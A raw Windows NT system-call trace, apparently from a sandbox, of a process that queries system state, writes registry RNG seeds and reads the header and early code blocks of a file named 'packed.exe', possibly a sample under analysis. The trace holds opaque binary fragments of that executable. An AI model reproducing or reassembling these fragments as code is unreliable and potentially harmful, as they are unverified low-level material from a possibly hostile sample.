 00676   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00677   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00678   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00679   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00680   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00681   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00682   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00683   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "\37J\261\4\264g\256{\311-T\3113\330\312&!\377nH\37\253AJK\4\13\304`11h)\216\355wN6\315\337\237\266\345i\360\324PH\0\316\36\256\2\262\314\7\30t\325ZiFLEE\252V\24\23S|\14\375\241\341\361\243>%\371", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "\37J\261\4\264g\256{\311-T\3113\330\312&!\377nH\37\253AJK\4\13\304`11h)\216\355wN6\315\337\237\266\345i\360\324PH\0\316\36\256\2\262\314\7\30t\325ZiFLEE\252V\24\23S|\14\375\241\341\361\243>%\371", 80, ... ) , 80, ... ) == 0x0
 00684   456   NtClose  (-2147482028, ... ) == 0x0
 00674   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "I\250f\330\303U\355\33]p\247\21\33\23\277\343\307\32:(\347\271_R_\210\216\231s"\376\3476x\200\310\233\255\305\3\3121\16\20\10\361\357\367\314&5)(\3476\225\33:\216\246\371V\5=Q\227\337A\351\365\336b\177\377\210\25\221\352\252x5\276\366\10\304\342k\334\262-\231\270i~\16\335\20\346\322\27\30D\223]Q\260\322\333C$b^\225\33\346\32b\340\34\207\317\254\327m\0\364\350\217\33\177h\353\226\311\302q\303P\24\261)\233\346\372C^a52]\302A\371+$\251\237\16\7\370\266n\17\370R\17\237\315\267\223\373KR \31q\200\322\266\31\242l\262[\366\232\327Z\316\27+\15\360-ws\14\353\223\221\262\35\304\266\314;Jp_\364W'\355\0\234\27\11\330QG\343\217P\347o\210\226\244\212\2619\275T\374\263\217\232"%\3319D\10(|~\12a\225\0\341\36\267\272\354y", ) \376\3476x\200\310\233\255\305\3\3121\16\20\10\361\357\367\314&5)(\3476\225\33:\216\246\371V\5=Q\227\337A\351\365\336b\177\377\210\25\221\352\252x5\276\366\10\304\342k\334\262-\231\270i~\16\335\20\346\322\27\30D\223]Q\260\322\333C$b^\225\33\346\32b\340\34\207\317\254\327m\0\364\350\217\33\177h\353\226\311\302q\303P\24\261)\233\346\372C^a52]\302A\371+$\251\237\16\7\370\266n\17\370R\17\237\315\267\223\373KR \31q\200\322\266\31\242l\262[\366\232\327Z\316\27+\15\360-ws\14\353\223\221\262\35\304\266\314;Jp_\364W'\355\0\234\27\11\330QG\343\217P\347o\210\226\244\212\2619\275T\374\263\217\232 ... {status=0x0, info=256}, "I\250f\330\303U\355\33]p\247\21\33\23\277\343\307\32:(\347\271_R_\210\216\231s"\376\3476x\200\310\233\255\305\3\3121\16\20\10\361\357\367\314&5)(\3476\225\33:\216\246\371V\5=Q\227\337A\351\365\336b\177\377\210\25\221\352\252x5\276\366\10\304\342k\334\262-\231\270i~\16\335\20\346\322\27\30D\223]Q\260\322\333C$b^\225\33\346\32b\340\34\207\317\254\327m\0\364\350\217\33\177h\353\226\311\302q\303P\24\261)\233\346\372C^a52]\302A\371+$\251\237\16\7\370\266n\17\370R\17\237\315\267\223\373KR \31q\200\322\266\31\242l\262[\366\232\327Z\316\27+\15\360-ws\14\353\223\221\262\35\304\266\314;Jp_\364W'\355\0\234\27\11\330QG\343\217P\347o\210\226\244\212\2619\275T\374\263\217\232"%\3319D\10(|~\12a\225\0\341\36\267\272\354y", ) , ) == 0x0
 00685   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242c0pr{\5e\261\34pr{\5e\261\34pr{\5e\261\34pr{\5e\261\34pr{\5e\351\232\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00686   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00687   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00688   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00689   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00690   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00691   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00692   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00693   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00694   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "\227\33\274R\21\272lP\35\11\235\3760\26Y\35v\255\321b\31\270\321]\3758\227\252\3a\24\235|\274\230{\216\2~\211!RSa\343\17\366\340\270C\\324\34\3636\6\6j\273[9\355P\324\373\270-;n\370PUG\345\246\11\324a\372\214", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "\227\33\274R\21\272lP\35\11\235\3760\26Y\35v\255\321b\31\270\321]\3758\227\252\3a\24\235|\274\230{\216\2~\211!RSa\343\17\366\340\270C\\324\34\3636\6\6j\273[9\355P\324\373\270-;n\370PUG\345\246\11\324a\372\214", 80, ... ) , 80, ... ) == 0x0
 00695   456   NtClose  (-2147482028, ... ) == 0x0
 00685   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "\337\377\236\317\323\272F\333\224\373.N\30\353#\227\220,\222V\11%\205\235\353\317 \230\261\335J41"\15\301J\334\230Jh\3542r\261X"\241tp\267\271\5w\360G%3\15\305M\357\3704\3220\372\324F\264}'\221j\327ee|\335I\302H,H\215\312\22\220\347\271\367gI\1 (\12D\245v\371s3\344Q\236Wi\262\2\250\303v\303\360tL\343\220[\360L\273\310\314\\362\341\322\357C\251}X\221\275\17\215p\10-\220\362\26\34E(6\220\0\262\324\302\211V\326v_\11\240(3\226\234c3\336x\364)\336\364(\261>\321\337At\270g\14\255r\25\211\205\30k2\270\345\123\10\12\3\374\13&7g\215\31'G\270\3\32Ck8\10\246-\351\264\350\325=Msc8KC@\242\371e\250\367\242\327\352doE\4\243+\206\300,\23\3332\2662\224T\317\2Q\246\247", ) \15\301J\334\230Jh\3542r\261X ... {status=0x0, info=256}, "\337\377\236\317\323\272F\333\224\373.N\30\353#\227\220,\222V\11%\205\235\353\317 \230\261\335J41"\15\301J\334\230Jh\3542r\261X"\241tp\267\271\5w\360G%3\15\305M\357\3704\3220\372\324F\264}'\221j\327ee|\335I\302H,H\215\312\22\220\347\271\367gI\1 (\12D\245v\371s3\344Q\236Wi\262\2\250\303v\303\360tL\343\220[\360L\273\310\314\\362\341\322\357C\251}X\221\275\17\215p\10-\220\362\26\34E(6\220\0\262\324\302\211V\326v_\11\240(3\226\234c3\336x\364)\336\364(\261>\321\337At\270g\14\255r\25\211\205\30k2\270\345\123\10\12\3\374\13&7g\215\31'G\270\3\32Ck8\10\246-\351\264\350\325=Msc8KC@\242\371e\250\367\242\327\352doE\4\243+\206\300,\23\3332\2662\224T\317\2Q\246\247", ) , ) == 0x0
 00696   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242c0pr{\5e\261\34pr{\5e\261\34pr{\5e\261\34pr{\5e\261\34pr{\5e\261\34pr{\5e\351\232\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00697   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00698   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00699   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00700   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00701   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00702   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00703   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00704   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00705   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "\0M\306\252\335\343\3157Dg"\212\246\260\163\206\3502\37gH\13O\351\300\42\267\220\247O\264s\344\320\26\314\233\244\334Y1S\230\272}\i\227\32R\265\202\353\304\2742E\2370\231\202>6$\307\35\251nc8\336(r\3\37\5)\236", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "\0M\306\252\335\343\3157Dg"\212\246\260\163\206\3502\37gH\13O\351\300\42\267\220\247O\264s\344\320\26\314\233\244\334Y1S\230\272}\i\227\32R\265\202\353\304\2742E\2370\231\202>6$\307\35\251nc8\336(r\3\37\5)\236", 80, ... ) \212\246\260\163\206\3502\37gH\13O\351\300\42\267\220\247O\264s\344\320\26\314\233\244\334Y1S\230\272}\i\227\32R\265\202\353\304\2742E\2370\231\202>6$\307\35\251nc8\336(r\3\37\5)\236", 80, ... ) == 0x0
 00706   456   NtClose  (-2147482028, ... ) == 0x0
 00696   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "\25\3368\304e^\235\245r%\231d_\375?\340\263\311i\244\306\245\226r\345\37%\214\264\16\353\202\366\234=\26\327\14\231\362\354 W\206u\14-\357\326R\331\365H\221\207\16($\232\202\222o\314\230\255\337\351\341\205\17\2663;V\271\312\206\24~\264\261\357\246\250\302\27\363\3328\214\243\236\345\341\255\306P1\341\7>\271t\334\316N\266\21B(V\213U\370\261\15\203e\207J\12\322;S\5\14\257\310\36\344\342;^-C\23\322P%\\744.\332\30\272\5\272>\231*\312\221^\22\25\333>k\366\220#\245\227\45=\235\6,\354\255YNE'\312\217\365\372s\326\377kti\254\241@\326\2644\236\255\14\377\202w\201\267\356\12\210\253\234r\277]\305\347\3H{\33\354x\257\331\365\332x\367\305\20\374{t@z:\327\366\16l\253\365\347?\326\177"\257\253t\371\250\25\21@\270\372\226\207\234\335", ) \257\253t\371\250\25\21@\270\372\226\207\234\335", ) == 0x0
 00707   456   NtUserRegisterWindowMessage  ( ("ObjectLink", ... ) , ... ) == 0xc002
 00708   456   NtAddAtom  ( ("O\0l\0e\0D\0r\0o\0p\0T\0a\0r\0g\0e\0t\0I\0n\0t\0e\0r\0f\0a\0c\0e\0", 44, 1244980, ... ) , 44, 1244980, ... ) == 0x0
 00709   456   NtAddAtom  ( ("O\0l\0e\0D\0r\0o\0p\0T\0a\0r\0g\0e\0t\0M\0a\0r\0s\0h\0a\0l\0H\0w\0n\0d\0", 48, 1244980, ... ) , 48, 1244980, ... ) == 0x0
 00710   456   NtUserRegisterWindowMessage  ( ("OM_POST_WM_COMMAND", ... ) , ... ) == 0xc08f
 00711   456   NtUserRegisterWindowMessage  ( ("OLE_MESSAHE", ... ) , ... ) == 0xc090
 00712   456   NtAllocateVirtualMemory  (-1, 1351680, 0, 4096, 4096, 4, ... 1351680, 4096, ) == 0x0
 00713   456   NtCreateFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\"}, 0x0, 128, 3, 2, 16417, 0, 0, ... ) }, 0x0, 128, 3, 2, 16417, 0, 0, ... ) == STATUS_OBJECT_NAME_COLLISION
 00714   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp"}, 1244636, ... ) }, 1244636, ... ) == 0x0
 00715   456   NtRequestWaitReplyPort  (24, {20, 48, new_msg, 0, 1350480, 1351024, 2012550797, 2147347456}  (24, {20, 48, new_msg, 0, 1350480, 1351024, 2012550797, 2147347456} "\0\0\0\0\2\0\1\0R\2\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 452, 456, 1516, 0} "\0\0\0\0\2\0\1\0\1\0\0\0\0\0\0\0\1\0\0\0" )  ... {20, 48, reply, 0, 452, 456, 1516, 0}  (24, {20, 48, new_msg, 0, 1350480, 1351024, 2012550797, 2147347456} "\0\0\0\0\2\0\1\0R\2\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 452, 456, 1516, 0} "\0\0\0\0\2\0\1\0\1\0\0\0\0\0\0\0\1\0\0\0" )  ) == 0x0
 00716   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1244644,  (0x80100080, {24, 0, 0x40, 0, 1244644, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc1.tmp"}, 0x0, 128, 0, 2, 96, 0, 0, ... 76, {status=0x0, info=2}, ) }, 0x0, 128, 0, 2, 96, 0, 0, ... 76, {status=0x0, info=2}, ) == 0x0
 00717   456   NtClose  (76, ... ) == 0x0
 00718   456   NtOpenFile  (0x10080, {24, 0, 0x40, 0, 0,  (0x10080, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc1.tmp"}, 7, 2113600, ... 76, {status=0x0, info=1}, ) }, 7, 2113600, ... 76, {status=0x0, info=1}, ) == 0x0
 00719   456   NtQueryInformationFile  (76, 1245016, 8, AttributeFlag, ... ) == STATUS_INVALID_PARAMETER
 00720   456   NtSetInformationFile  (76, 1245067, 1, Disposition, ... {status=0x0, info=0}, ) == 0x0
 00721   456   NtClose  (76, ... ) == 0x0
 00722   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe"}, 1244860, ... ) }, 1244860, ... ) == 0x0
 00723   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1244840,  (0x80100080, {24, 0, 0x40, 0, 1244840, "\??\u:\work\packed.exe"}, 0x0, 32, 1, 1, 96, 0, 0, ... 76, {status=0x0, info=1}, ) }, 0x0, 32, 1, 1, 96, 0, 0, ... 76, {status=0x0, info=1}, ) == 0x0
 00724   456   NtQueryInformationFile  (76, 1244908, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 00725   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\345\241n\230\241\300\0\313\241\300\0\313\241\300\0\313/\310_\313\243\300\0\313\241\300\1\313:\300\0\313"\310]\313\260\300\0\313\365\3430\313\251\300\0\313f\306\6\313\240\300\0\313Rich\241\300\0\313\0\0\0\0\0\0\0\0PE\0\0L\1\5\0\221\227\260A\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\\0\0\0\206\2\0\0\4\0\0\34>\0\0\0\20\0\0\0p\0\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0\220\3\0\0\4\0\0\0\0\0\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\310s\0\0\264\0\0\0\0\200\3\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0p\0\0\214\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0\374[\0\0\0\20\0\0\0\\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0`.rdata\0\0\300\21\0\0", ) \310]\313\260\300\0\313\365\3430\313\251\300\0\313f\306\6\313\240\300\0\313Rich\241\300\0\313\0\0\0\0\0\0\0\0PE\0\0L\1\5\0\221\227\260A\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\\0\0\0\206\2\0\0\4\0\0\34>\0\0\0\20\0\0\0p\0\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0\220\3\0\0\4\0\0\0\0\0\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\310s\0\0\264\0\0\0\0\200\3\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0p\0\0\214\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0\374[\0\0\0\20\0\0\0\\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0 \0\0`.rdata\0\0\300\21\0\0", ) == 0x0
 00726   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\0\0\0\0\0\0\0\0\0\0\0@\0\0@.data\0\0\0\324`\2\0\0\220\0\0\0\4\0\0\0r\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0\300.ndata\0\0\0\200\0\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\200\0\0\300.rsrc\0\0\0\0\20\0\0\0\200\3\0\0\10\0\0\0v\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0
 00727   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "U\213\354\203\354D\213E\10SVW\213\10\215p\20\213@\4\211M\310\213\216\250\233\0\0\213\236\30\5\0\0\211E\314\213\206\34\5\0\0\211E\300\213\206\244\233\0\0;\310\211M\320s\5+\301H\353\10\213\206\240\233\0\0+\301\211E\324\351\303\11\0\0\377$\205O\32@\0\203}\314\0\17\204\302\11\0\0\213E\310\377M\314\213\313\17\266\0\323\340\11E\300\377E\310\203\303\10\203\373\3r\333\213E\300\203\353\3\301m\300\3\203\340\7\213\310\200\341\1\366\331\33\311\203\341\7\321\350\203\301\10\203\350\0\211\216\24\5\0\0\17\204.\1\0\0HtVHtHH\17\205]\11\0\0\203\317\377\307\6\21\0\0\0\213E\300\213M\10\211\206\34\5\0\0\213E\314\211\236\30\5\0\0\211A\4\213E\10\213M\310P\211\10\213M\320\211\216\250\233\0\0\350\240\11\0\0\213\307_^[\311\302\4\0\307\6\13\0\0\0\351\21\11\0\0\200=\200\245@\0\0\17\205\240\0\0\0\203e\370\0\270\0\224@\0=<\226@\0\261\10~\24=\0\230@\0}\4\376\301\353\11=`\230@\0}\2\261\7\17\276\311\211\10\203\300\4=\200\230@\0|\324\215E\370\277\0\224@\0Ph\0\235@\0h$\220@\0h\374\223@\0h\340r@\0h\240r@\0h\1\1\0\0h \1\0\0W\350\200\11\0\0j\36Yj\5X\363\253\215E\370Ph\0\235@\0h(\220@\0h\370\223@\0h\s@\0h s@\0j\0j\36h\0\224@\0\350M\11\0\0\376\5\200\245@\0\240$\220@\0\210F\20\240(\220@\0\210F\21\241\374\223@\0\211F\24\241\370\223@\0\211F\30\203&\0\351<\10\0\0\213\313\307\6\11\0\0\0\203\341\7\323m\300+\331\351'\10\0\0\203}\314\0\17\204-", ) , ) == 0x0
 00728   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\266\0\323\340\11E\300\377E\310\203\303\10\203\373\20r\333\213E\3003\333%\377\377\0\0\211]\300;\303\211F\4\17\204\351\0\0\0j\12X\351\347\0\0\0\203}\314\0\17\204\350\7\0\0\213E\324\205\300\17\205\230\0\0\0\213\216\240\233\0\0\213U\320;\321u)\213\206\244\233\0\0\215\276\240\33\0\0;\307t\31\213\327;\320\211U\320s\5+\302H\353\4+\312\213\301\205\300\211E\324ub\377u\10\211\226\250\233\0\0\350\4\10\0\0\213\226\250\233\0\0\213\216\244\233\0\0;\321\211U\320s\7\213\301+\302H\353\10\213\206\240\233\0\0+\302\213\276\240\233\0\0\211E\324;\327u\35\215\226\240\33\0\0;\321t\23\211U\320s\7+\312I\213\301\353\4+\372\213\307\211E\324\205\300\17\204a\7\0\0;E\314r\3\213E\314\213N\4;\310\213\371r\2\213\370W\377u\310\377u\320\350qR\0\0\1}\310)}\314\1}\320)}\324)~\4\17\205\1\7\0\0\213\206\24\5\0\0\211\6\351\364\6\0\0\203}\314\0\17\204\372\6\0\0\213E\310\377M\314\213\313\17\266\0\323\340\11E\300\377E\310\203\303\10\203\373\16r\333\213E\300%\377?\0\0\213\310\211F\4\203\341\37\200\371\35\17\207Y\375\377\377%\340\3\0\0=\240\3\0\0\17\207I\375\377\377\301m\300\16\203\353\16\203f\10\0\307\6\14\0\0\0\213F\4\301\350\12\203\300\49F\10si\353 \203}\314\0\17\204\213\6\0\0\213E\310\377M\314\213\313\17\266\0\323\340\11E\300\377E\310\203\303\10\203\373\3r\333\213N\10\213E\300\203\340\7\203\353\3\17\276\211\214r@\0\301m\300\3\211D\216\14\213N\4\377F\10\213F\10\301\351\12\203\301\4;\301r\315\353\22\213F\10\17\276\200\214r@\0\203d\206\14\0\377", ) , ) == 0x0
 00729   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\276\14\5\0\0Q\215\216 \5\0\0Q\215\216\20\5\0\03\300WQP\211E\370Pj\23\215F\14j\23P\307\7\7\0\0\0\350\310\6\0\0\205\300u\229\7t\16!F\10\307\6\15\0\0\0\351\35\1\0\0\307\6\21\0\0\0\351\304\5\0\0\213\206\14\5\0\0\353 \203}\314\0\17\204\302\5\0\0\213M\310\377M\314\17\266\21\213\313\323\342\11U\300\377E\310\203\303\10;\330r\334\17\267\4E\0\220@\0#E\300\213\216\20\5\0\0\215\4\201\17\266P\1\17\267@\2\203\370\20\211E\354s\26\213\312+\332\323m\300\213N\10\211D\216\14\377F\10\351\254\0\0\0\203\370\22u\14j\7\307E\370\13\0\0\0X\353,\203\300\362\307E\370\3\0\0\0\353 \203}\314\0\17\204G\5\0\0\213M\310\377M\314\17\2669\213\313\323\347\11}\300\377E\310\203\303\10\215\14\20;\331r\331\213\312+\332\323m\300\17\267\14E\0\220@\0#M\300\213U\370+\330\3\321\213\310\213F\4\323m\300\213N\10\213\370\301\357\5\203\347\37\203\340\37\215\204\7\2\1\0\0\215<\12;\370\17\207|\373\377\377\203}\354\20u\17\203\371\1\17\202m\373\377\377\213|\216\10\353\23\377\215D\216\14\2118A\203\300\4Ju\367\211N\10\213F\4\213N\10\213\320\203\340\37\301\352\5\203\342\37\215\204\2\2\1\0\0;\310\17\202\316\376\377\377\213F\4\203\246\20\5\0\0\0\203e\364\0\213\370\301\350\5\203\347\37\271\1\1\0\0\203\340\37\3\371@\215U\364\211E\354\215\206 \5\0\0RP\215E\374\307E\374\11\0\0\0P\215E\350Ph\340r@\0h\240r@\0Q\215F\14WP\307E\360\6\0\0\0\350\33\5\0\0\203}\374\0u\3\203\310\377\205\300\17\205\312\372\377\377\215E\364P\215\206 ", ) , ) == 0x0
 00730   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "h\s@\0h s@\0j\0\377u\354\215D\276\14P\350\336\4\0\0\205\300\17\205\226\372\377\377\213E\360\205\300u\14\201\377\1\1\0\0\17\217\203\372\377\377\212M\374\203&\0\210F\21\213E\350\211F\24\213E\344\210N\20\211F\30\17\266F\20\211F\14\213F\24\211F\10\307\6\1\0\0\0\213F\14\353 \203}\314\0\17\204\266\3\0\0\213M\310\377M\314\17\266\21\213\313\323\342\11U\300\377E\310\203\303\10;\330r\334\17\267\4E\0\220@\0#E\300\213N\10\215\4\201\17\266H\1\323m\300+\331\17\266\10\205\311u\22\17\267@\2\211F\10\307\6\6\0\0\0\351Y\3\0\0\366\301\20t\30\203\341\17\211N\10\17\267@\2\211F\4\307\6\2\0\0\0\351<\3\0\0\366\301@\17\204\321\0\0\0\366\301 \17\204\315\371\377\377\307\6\7\0\0\0\351\37\3\0\0\213F\10\353 \203}\314\0\17\204 \3\0\0\213M\310\377M\314\17\266\21\213\313\323\342\11U\300\377E\310\203\303\10;\330r\334\17\267\14E\0\220@\0#M\300\1N\4\213\310\323m\300+\330\17\266F\21\211F\14\213F\30\211F\10\307\6\3\0\0\0\213F\14\353 